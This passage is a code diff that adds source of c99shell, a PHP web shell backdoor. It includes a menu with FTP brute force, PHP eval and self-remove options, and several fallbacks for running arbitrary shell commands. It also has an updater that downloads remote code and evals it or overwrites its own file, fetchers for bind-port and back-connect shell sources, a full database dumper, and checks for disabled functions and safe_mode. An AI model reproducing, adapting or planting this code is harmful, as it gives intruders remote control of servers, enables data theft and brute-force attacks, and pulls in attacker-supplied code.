+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"), 
+ array("<b>Tools</b>",$surl."act=tools&d=%d"), 
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"), 
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>Sec.</b>",$surl."act=security&d=%d"), 
+ array("<b>SQL</b>",$surl."act=sql&d=%d"), 
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"), 
+ array("<b>Update</b>",$surl."act=update&d=%d"), 
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"), 
+ array("<b>Self remove</b>",$surl."act=selfremove"), 
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") 
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+} 
+function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+} 
+function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+} 
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by C99Shell.SQL v. ".$shver." 
+# Home page: http://ccteam.ru 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
